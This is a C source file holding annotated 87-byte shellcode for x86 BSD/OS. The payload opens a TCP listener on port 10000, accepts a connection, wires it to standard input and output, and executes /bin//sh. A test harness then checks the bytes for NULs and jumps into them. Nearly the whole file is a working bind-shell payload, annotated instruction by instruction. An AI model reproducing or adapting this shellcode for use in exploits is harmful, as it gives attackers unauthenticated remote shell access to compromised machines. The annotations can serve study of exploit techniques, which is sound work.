/* 87-byte port-binding shellcode - BSDi-x86 (BSD/OS)
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: BSDI BSD/OS 4.2
 *
 * What the bytes below do: create a TCP socket, bind it to INADDR_ANY
 * port 10000, accept one connection, dup2() it onto fds 2/1/0 and
 * execve() "/bin//sh".  Every system call goes through an
 * "lcall 7:0 ; ret" stub the payload builds on the stack, so this is
 * specific to a 32-bit BSD/OS-style kernel.  The payload contains no
 * NUL bytes, so strlen() on it is a valid length/NUL check.
 */

/*
 * The payload, kept as a NUL-free string so strlen() doubles as a
 * NUL-byte check (87 bytes; see main()).
 *
 * The annotations are a reading of the bytes.  Syscall numbers are named
 * as in 4.4BSD-derived syscalls.h (socket=97, bind=104, listen=106,
 * accept=30, dup2=90, execve=59) -- NOTE(review): confirm against the
 * BSD/OS 4.2 syscall table.
 */
char code[] =

   /* 1. Build the syscall stub.  ~0x3cfff8ff == 0xc3000700 and 0x9a are
    *    pushed so memory at esp holds  9a 00 00 00 00 07 00  c3, i.e.
    *    "lcall 0007:00000000 ; ret" (the BSD syscall gate).  edi keeps
    *    its address.  Each "call edi" below is a syscall with the number
    *    in al and arguments pushed right-to-left.  The stub's ret pops
    *    only the return address, so earlier arguments stay on the stack
    *    and are reused by a later call where noted. */
   "\xb8\xff\xf8\xff\x3c"	// mov    eax, 0x3cfff8ff   (NUL-free form of ~0xc3000700)
   "\xf7\xd0"			// not    eax               -> 0xc3000700
   "\x50"			// push   eax               -> bytes 00 07 00 c3
   "\x31\xc0"			// xor    eax, eax
   "\xb0\x9a"			// mov    al, 0x9a          (lcall far opcode)
   "\x50"			// push   eax               -> bytes 9a 00 00 00
   "\x89\xe7"			// mov    edi, esp          edi = &stub
   /* 2. s = socket(AF_INET=2, SOCK_STREAM=1, 0).  mul by zero also
    *    clears edx, which serves as the NULL argument later on. */
   "\x31\xdb"			// xor    ebx, ebx
   "\xf7\xe3"			// mul    ebx               eax = edx = 0
   "\x53"			// push   ebx               protocol 0
   "\x43"			// inc    ebx
   "\x53"			// push   ebx               type 1
   "\x43"			// inc    ebx
   "\x53"			// push   ebx               domain 2 (ebx stays 2)
   "\xb0\x61"			// mov    al, 97            SYS_socket
   "\xff\xd7"			// call   edi
   "\x89\xc6"			// mov    esi, eax          esi = listening socket
   /* 3. Build a sockaddr_in on the stack and bind(s, &sa, 16).
    *    Bytes at esp: 02 00 27 10 00 00 00 00 -> with the 4.4BSD layout
    *    sin_len=2, sin_family=0, sin_port=0x2710 (10000, network order),
    *    sin_addr=INADDR_ANY.  NOTE(review): sin_family is 0, not AF_INET;
    *    the author reports this binds on BSD/OS 4.2, presumably because
    *    its in_pcbbind does not enforce the family -- verify.  The other
    *    8 of the 16 bytes are leftover stack contents (sin_zero,
    *    presumably ignored). */
   "\x52"			// push   edx               sin_addr = 0
   "\x66\x68\x27\x10"		// push   word 0x1027       sin_port bytes 27 10 = port 10000
   "\x66\x53"			// push   bx                bytes 02 00 = sin_len/sin_family
   "\x89\xe5"			// mov    ebp, esp          ebp = &sa
   "\x6a\x10"			// push   byte 16           addrlen
   "\x55"			// push   ebp               &sa
   "\x56"			// push   esi               s
   "\xb0\x68"			// mov    al, 104           SYS_bind
   "\xff\xd7"			// call   edi
   /* 4. listen(s, backlog), reusing bind's arguments still on the
    *    stack: backlog is the sockaddr pointer value, i.e. an arbitrary
    *    large/negative number -- presumably clamped by the kernel. */
   "\xb0\x6a"			// mov    al, 106           SYS_listen
   "\xff\xd7"			// call   edi
   /* 5. c = accept(s, NULL, NULL). */
   "\x52"			// push   edx               addrlen = NULL
   "\x52"			// push   edx               addr = NULL
   "\x56"			// push   esi               s
   "\xb0\x1e"			// mov    al, 30            SYS_accept
   "\xff\xd7"			// call   edi               eax = client fd
   /* 6. dup2 the connection onto fds 2, 1, 0.  dup2 returns newfd, which
    *    becomes the next call's oldfd: dup2(c,2); dup2(2,1); dup2(1,0).
    *    The loop ends when ebx goes negative; eax is then 0 (assuming
    *    the last dup2 succeeded) and is reused as NULL below. */
   "\x53"			// duploop: push ebx        newfd (2, 1, 0)
   "\x50"			// push   eax               oldfd
   "\xb0\x5a"			// mov    al, 90            SYS_dup2
   "\xff\xd7"			// call   edi
   "\x4b"			// dec    ebx
   "\x79\xf7"			// jns    duploop           (rel8 -9: back to the push ebx above)
   /* 7. execve("/bin//sh", argv, NULL).  The doubled slash pads the
    *    path to 8 bytes without a NUL.  argv points at a single NULL
    *    (the shell starts with argc == 0); envp is NULL. */
   "\x50"			// push   eax               NUL terminator (eax == 0)
   "\x68\x2f\x2f\x73\x68"	// push   dword "//sh"
   "\x68\x2f\x62\x69\x6e"	// push   dword "/bin"
   "\x89\xe3"			// mov    ebx, esp          ebx = "/bin//sh"
   "\x50"			// push   eax               argv[0] = NULL
   "\x54"			// push   esp               argv = &that NULL
   "\x53"			// push   ebx               path
   "\xb0\x3b"			// mov    al, 59            SYS_execve
   "\xff\xd7";			// call   edi


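/* The original relied on implicit declarations of printf/strlen, which
 * C99 removed; declare them properly. */
#include <stdio.h>
#include <string.h>

/*
 * Test harness: report the payload length, check it for embedded NUL
 * bytes, then jump into it.
 *
 * strlen(code) is the classic shellcode NUL check: the payload is
 * sizeof code - 1 bytes long, and strlen() only agrees with that when no
 * 0x00 byte would terminate a strcpy-style copy early.
 *
 * Running the payload only makes sense on the target it was written for:
 * a 32-bit BSD/OS-style kernel with an lcall 7:0 syscall gate, and a
 * build where the page holding `code` is executable.  On a modern
 * NX/W^X system, a 64-bit process, or any other OS, a() will fault.
 *
 * Returns 0 if the payload ever returns (it normally does not: on success
 * execve replaces the process).
 */
int main(void)
{
  size_t len = strlen(code);

  /* %zu: strlen returns size_t, the original's %d was a type mismatch. */
  printf("size: %zu bytes\n", len);
  if (len != sizeof code - 1)
    printf("warning: embedded NUL at offset %zu\n", len);

  /* Object-pointer -> function-pointer conversion is not portable C;
   * it is what every shellcode harness does and compilers accept it. */
  void (*a)(void) = (void (*)(void))(void *)code;
  a();
  return 0;
}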
